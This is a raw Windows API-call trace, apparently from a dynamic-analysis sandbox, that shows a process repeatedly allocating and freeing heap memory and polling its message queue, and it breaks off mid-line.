[0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0162.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.408] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.409] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.409] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0162.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0162.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.413] HeapFree (in: hHeap=0x8a0000, 